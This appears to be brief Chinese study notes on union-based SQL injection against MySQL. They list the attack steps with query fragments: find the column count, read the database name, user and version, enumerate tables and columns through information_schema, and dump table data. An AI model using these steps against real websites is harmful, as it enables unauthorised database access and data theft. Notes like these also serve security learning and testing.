注入流程
1.获取字段总数
order by *group by *select 1,2,3进行连接查询
union select 1,2,3
2.获取数据库
select databale(); //查看当前数据库名
select user(); //查看当前用户
select version();//查看数据库版本
3.获取数据库里面的表
information_schema //内置函数查看表
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=#数据库名字;//查看表 database();
4.获取数据库表中的字段
information_schema //内置函数查看表
select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME= '#表名' ;//查看表字段
5.获取表中数据
说明:通过union select既然可注入 我们获取到相应的库和表 那么通过联合查询结果
union select * from table
